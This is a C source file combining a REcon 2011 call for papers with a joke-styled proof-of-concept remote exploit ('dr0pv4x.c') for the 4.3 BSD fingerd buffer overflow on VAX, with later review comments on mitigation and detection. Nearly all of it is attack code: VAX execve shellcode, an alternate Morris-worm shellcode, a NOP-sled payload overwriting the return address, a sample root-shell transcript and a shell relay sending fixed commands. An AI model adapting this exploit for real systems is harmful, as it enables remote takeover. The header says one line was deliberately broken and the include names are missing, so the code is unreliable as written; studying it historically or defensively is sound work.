/* + + + + + + + + + \ / + _ - _+_ - ,__ _=. .:. /=\ _|===|_ ||::| | | _|. | | | | | | __===_ -=- ||::| |==| | | __ |.:.| /\| |:. | | | | .|| : |||::| | |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.| __|. | |_|. | |.|...||---| |==| | | | |_--. || |||. | | | | |. | | |::.||: .| |==| | . : |=|===| :|| . ||| .| |:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | | | | | | |' : . | ; ; ' | ' : ` : ' . ' . . : ' . R E C O N 2 0 1 1 . ` . . ' . C F P 0000000 REC0N 2011 (http://recon.cx) 0000020 JULY 8-10 0000040 HYATT REGENCY (New venue) 0000060 M0NTREAL 0000100 0000120 + REC0N 2011 0000140 - Conference and training 0000160 - No censorship, no sales pitches 0000200 - Videos from 2010 are coming online 0000220 0000240 + Now accepting submissions 0000260 - Single track 0000300 - 60 & 30 minute time slots 0000320 - Lightning talks at the party 0000340 0000360 + Primary topics 0000400 - Reverse engineering and/or exploitation: 0000420 + Software 0000440 - Malware 0000460 - Protection/DRM 0000500 - Anti-reversing 0000520 - Static/runtime analysis 0000540 + Hardware 0000560 - Embedded devices, consoles, femtocell 0000600 - Cellphones 0000620 - RFID, SDR (software defined radio) 0000640 - Side channel attacks 0000660 - Physical security (cameras, access control) 0000700 + Protocol 0000720 - GSM / CDMA 0000740 0000760 + Also of interest to us 0001000 - Privacy 0001020 + Anti-censorship 0001040 + Anti-surveillance 0001060 + Anonymity 0001100 + Counter-forensics 0001120 0001140 + Anything else elite 0001160 0001200 + Please include 0001220 - Short summary 0001240 - Name or alias 0001260 - Contact information 0001300 - Bio 0001320 0001340 + Important dates 0001360 - Training/conference registration opens March 20, 2011 0001400 - First round of selections: April 10, 2011 0001420 - CFP closes May 15, 2011 0001440 0001460 + Send submissions to 0001500 - cfp2011 @ recon.cx 0001520 0001540 + Speaker / attendee privacy 0001560 - Recon does not require speakers use their real names 
0001600 - Recon does not provide attendee or speaker information to third-parties 0001620 (except where necessary for registration/payment) * w0rd, n0w ph0r th3 g00dz.. * [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] * * dr0pv4x.c * t0p-s3kR1t w4r3z k0m1n' @ ya * str8 fr0m the k0d3l1n3 * -th3 phr3zh pr1nc3 0f b3llk0r3 * w8, b4 i ph0rg3t, 3t3rn4l sh0utz 2: route/daemon9, sw_r, Phiber Optik, Mendax, The Last Stage of Delirium (sup guys), 8lgm, klog[ADM], luvz2chat, netl1nk, l0r3nz0, dmk, root@vax.recon.cx (lol), SN, Fravia, Mammon_, m1x, madruquz, xmux, the current maintainer of the sexchart, so1o*, newsham, lcamtuf, Ilfak, archive.org, m4tr1x, u4ea, Acid Phreak, ACiD BuRN, Bi-Curious George, hypatia, tdz, Lady Gaga, Lindsay Lohan, gov-boi, jennicide, netw1z, Johnny Lee Miller, pluvius, rtm, das_modem, imm, w1z4rd, l0renz, Subgraph & The Future Crew * a1ght, s0 ch3k1t, jU$t f0ll0w th3z3 E-Z st3pz * st3p 1: c0mp1l3 * st3p 2: cl0z3 uR 3y3z & r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4 OLD WAREZ = NO WAREZ ;) * st3p 3: ./dr0pv4x [target] offset + pr3st0 + $ ./dropvax X.X.X.X -12345 [+] ATDT X.X.X.X [+] CONNECT 9600 [+] Return address: 0xUWISH [*] Compiled for little-endian arch. [+] Sent payload... [+] Shell! 4.3 BSD UNIX #3: Sat Feb 14 20:31:03 PST 2004 16:56 up 6:08, 1 user, load average: 0.09, 0.06, 0.03 User tty from login@ idle JCPU PCPU what root co 10:49 1 -sh -if whoami: root Warning: no access to tty; thus no job control in this shell... # exit k p8ce 0ut, - dj j4zzy 3fn3t & th3 phr3zh pr1nc3 0f b3llk0r3 Responsible Disclosure: ++w3 h4v3 p3r$0n4lly br0k3n th1$ expl01t 1n a w4y th4t 1z m0r3-th4n-s1mpl3 t0 f1x (1 br0k3n l1n3) w1th th3 1nph0rm4t10n pr0v1d3d 1n th3 k0MM3ntz++ * [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] * (research purposes only!!!) 
*/

/*
 * NOTE(review): everything below is a proof-of-concept for the stack
 * overflow in the 4.3 BSD fingerd binary on VAX, as the comments further
 * down describe.  The header comment above states that the authors
 * deliberately left one line broken; this annotation pass leaves every
 * code token unchanged and does not try to identify or repair that line.
 *
 * NOTE(review): the header names of the #include directives below were
 * lost when the page was extracted (presumably angle-bracket names eaten
 * as markup), so the listing does not compile as shown.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/*
 * bswap(value): when BIG_ENDIAN_ARCH is defined, reverse the byte order of
 * a 32-bit value so that words stored into the outgoing buffer end up in
 * the same byte order a little-endian build would produce; otherwise the
 * value is passed through unchanged.  The macro relies on the u32 typedef
 * declared further down, which is in scope at every point of use.
 */
#ifdef BIG_ENDIAN_ARCH
#define bswap(value) \
    (((u32) (value)) << 24 |\
    (((u32) (value)) & 0x0000FF00) << 8 |\
    (((u32) (value)) & 0x00FF0000) >> 8 |\
    ((u32) (value)) >> 24)
#else
#define bswap(value) (value)
#endif

/*
 * NOTE(review): legacy declaration; on current C libraries errno is
 * normally a macro supplied by <errno.h>, and redeclaring it like this can
 * conflict with that definition.
 */
extern int errno;

int try_finger(char *, int);
void fdsh(int);

/* 32-bit unsigned alias used for the payload words and by bswap(). */
uint32_t typedef u32;

#ifndef USE_ALTERNATE_SHELLCODE
/* VAX-11 shellcode w/ explanation */
/* execve("/bin/sh", NULL, NULL) - Take advantage of the 4.3 BSD UNIX VM.
   It always puts the process entry point (_start) at address 0x00000000.
   This gives us valid memory (a zero-byte string, since the first two
   bytes of procedures like _start on VAX (those called with "callg"
   instr.) are the saved register-mask, and in _start's case this is zero
   (does not matter). Furthermore, this line in kern_exec.c checks if:
   if (ap == NULL && uap->envp) { uap->argp = NULL; ... }
   So we don't need a valid argv at address zero. See the VAX Architecture
   Reference Manual (VARM) or the VAX Architecture Handbook.
   http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy of the internal
   version of the VARM, which will help explain the stack frame and the
   instruction set. */
unsigned char shellcode[] =
    "\021\017" /* brb shellcode+0x11 (PC-relative) */
    "\272\001" /* popr $0x1 (this is a mask: pop one word into r0) */
    "\335\000\335\000" /* pushl $0 ; pushl $0 */
    "\335P" /* pushl %r0 (address of /bin/sh string) */
    "\335\003" /* pushl $0x3 */
    "\320^\\" /* movl %sp, %ap */
    "\274;" /* chmk $0x3b (change mode to kernel, 0x3b = execve) */
    "\026\357\353" /* jsb shellcode+0x4 (PC-relative) */
    "\377\377\377"
    "/bin/sh"; /* .asciz "/bin/sh" */
#else /* USE_ALTERNATE_SHELLCODE */
/* RTMorris Internet Worm (1988) */
/* If you think the shellcode is the problem, try this one. */
u32 shellcode[] = {
    bswap(0x732f8fdd),
    bswap(0x8fdd0068),
    bswap(0x6e69622f),
    bswap(0xdd5a5ed0),
    bswap(0xdd00dd00),
    bswap(0xd003dd5a),
    bswap(0x3bbc5c5e)
};
#endif

/*
 * Send(str): transmit a NUL-terminated string on the socket.  The macro
 * expands to a use of a variable named `sock`, so it only works inside a
 * function that has one in scope (fdsh below).  The result of send() is
 * discarded.
 */
#define Send(str) send(sock, (str), strlen(str), 0)

/*
 * fdsh - relay between the local terminal and an already-connected socket.
 *
 * Prints a status line, waits one second, writes four fixed command lines
 * to the socket, then loops on select(): bytes read from fd 0 are sent to
 * the socket and bytes read from the socket are written to fd 1.  Returns
 * when select() fails or when either read() returns 0 or a negative value.
 *
 * NOTE(review, detection): the four command strings are constant, so the
 * sequence "strings /vmunix | fgrep UNIX" followed by "exec csh -if"
 * arriving on a connection to the finger port is a stable indicator for
 * anyone inspecting captured traffic or process accounting on the server.
 */
void fdsh(int sock)
{
    printf("[+] Sent payload...\n");
    sleep(1);
    Send("echo '[+] Shell!'; PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
    Send("export PATH\n");
    Send("strings /vmunix | fgrep UNIX\n");
    Send("w ; echo whoami: ; whoami; exec csh -if\n");
    for (;;) {
        fd_set fds;
        char buf[2048];
        int nb;

        /* The set is rebuilt on every pass because select() overwrites it. */
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sock, &fds);
        if (select(sock + 1, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            return;
        }
        if (FD_ISSET(0, &fds)) {
            nb = read(0, buf, sizeof(buf));
            /* nb == 0 is end-of-file, not an error; perror() then reports
               whatever errno happened to hold. */
            if (nb <= 0) {
                perror("read(2)");
                return;
            }
            send(sock, buf, nb, 0); /* return value ignored */
        }
        if (FD_ISSET(sock, &fds)) {
            nb = read(sock, buf, sizeof(buf));
            if (nb <= 0) {
                perror("read(2)");
                return;
            }
            write(1, buf, nb); /* return value ignored */
        }
    }
}

/* This routine exploits a fixed 512 byte input buffer in a VAX running
 * the BSD 4.3 fingerd binary. It sends 536 bytes (plus a newline) to
 * overwrite six extra words in the stack frame, including the return
 * PC, to point into the middle of the string sent over. The instructions
 * in the string do the direct system call version of execve("/bin/sh").
 */
/* From sp4f ^^^^^^^ (lolololol) */
/*
 * Here's what the VAX-11 stack frame looks like (from 4.3 BSD's :
 * NOTE(review): the header name after "4.3 BSD's" was lost in extraction.
 */
#if 0
struct frame {
    int fr_handler;
    u_int fr_psw:16, /* saved psw */
          fr_mask:12, /* register save mask */
          :1,
          fr_s:1, /* call was a calls, not callg */
          fr_spa:2; /* stack pointer alignment */
    int fr_savap; /* saved arg pointer */
    int fr_savfp; /* saved frame pointer */
    int fr_savpc; /* saved program counter */
};
#endif

/*
 * try_finger - connect to the finger service on `host` and send the
 * oversized request described in the comment above.
 *
 * host:   dotted-quad address or a name resolved with gethostbyname().
 * offset: subtracted from the hard-coded base 0x7fffe8a8 to form the
 *         address stored in word 132 of the request.
 *
 * Returns -1 if name resolution, socket() or connect() fails, 0 otherwise
 * (after fdsh() has returned).  The socket is never closed on any path.
 *
 * NOTE(review, mitigation): the request only matters because the service
 * reads a line into a fixed 512-byte buffer without a length limit; a
 * size-bounded read on the server side removes the flaw.  The code also
 * depends on a fixed, predictable stack address, which address-space
 * randomisation and non-executable stacks on later systems take away.
 *
 * NOTE(review, detection): a finger request is normally a short line; a
 * 536-byte request to TCP port 79 that starts with 400 bytes of 0x01 is
 * anomalous on length alone.
 */
int try_finger(char *host, int offset)
{
    int s, i;
    struct sockaddr_in sin = { 0 };
    u32 retaddr = 0x7fffe8a8 - offset;
    char buf[536];

    sin.sin_family = PF_INET;
    sin.sin_port = htons(79); /* finger */
    sin.sin_addr.s_addr = inet_addr(host);
    /* -1 is inet_addr()'s failure value: fall back to a name lookup. */
    if (sin.sin_addr.s_addr == -1) {
        struct hostent *h;

        h = gethostbyname(host);
        if (h == NULL) {
            herror("gethostbyname(3)");
            return -1;
        }
        bcopy(h->h_addr, &sin.sin_addr, sizeof(u32));
    }
    if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
        perror("socket(2)");
        return -1;
    }
    printf("[+] ATDT %s\n", inet_ntoa(sin.sin_addr));
    if (connect(s, (void *)&sin, sizeof(sin)) < 0){
        perror("connect(2)");
        printf("[-] NO DIALTONE\n");
        return -1;
    }
    printf("[+] CONNECT 9600\n");

    /* Buffer layout: bytes 0..399 filler, shellcode[] copied at offset 400,
       the remainder zeroed, then words 128..133 (byte offsets 512..535, the
       part beyond the 512-byte buffer) overwritten below. */
    for (i = 0; i < 400; i++)
        buf[i] = '\001'; /* VAX-11 NOP */
    bcopy(shellcode, buf + 400, sizeof(shellcode));
    /* i is a signed int compared against size_t values in this loop. */
    for (i = 400 + sizeof(shellcode); i < sizeof(buf); i++)
        buf[i] = '\0'; /* VAX-11 HALT, try not to land on one. */
    printf("[+] Return address: %#x\n", retaddr);
#ifdef BIG_ENDIAN_ARCH
    printf("[*] Compiled for big-endian arch.\n");
#else
    printf("[*] Compiled for little-endian arch.\n");
#endif
    /* NOTE(review): writing through (u32 *)buf assumes the char array is
       suitably aligned for 32-bit stores and sidesteps the aliasing rules. */
    *((u32 *)buf + 128) = bswap(0x7fffeab0);
    *((u32 *)buf + 129) = bswap(0x7fffeb60);
    *((u32 *)buf + 130) = bswap(0x20000000);
    *((u32 *)buf + 131) = bswap(0x7fffeb64);
    *((u32 *)buf + 132) = bswap(retaddr);
    *((u32 *)buf + 133) = 0;
    send(s, buf, sizeof(buf), 0); /* sizeof (buf) == 536 */
    send(s, "\n", 1, 0);
    fdsh(s);
    printf("[-] NO CARRIER\n");
    return 0;
}

/*
 * Entry point: argv[1] is the host, optional argv[2] the offset (parsed
 * with atoi(), so non-numeric text is read as 0).  Prints a usage line and
 * exits with status 1 when no host is given.
 *
 * NOTE(review): the function has no declared return type (implicit int,
 * rejected by C99 and later), and v[2] is read before the argument count
 * is checked, which indexes past the argv terminator when no arguments
 * are supplied.
 */
main(int c, char **v)
{
    char *host = v[1], *ofs = v[2];

    if (!*(++v)) {
        fprintf(stderr, "usage: %s hostname [offset]\n", *(--v));
        exit(1);
    }
    if (c > 2)
        try_finger(host, atoi(ofs));
    else
        try_finger(host, 0);
    exit(0);
}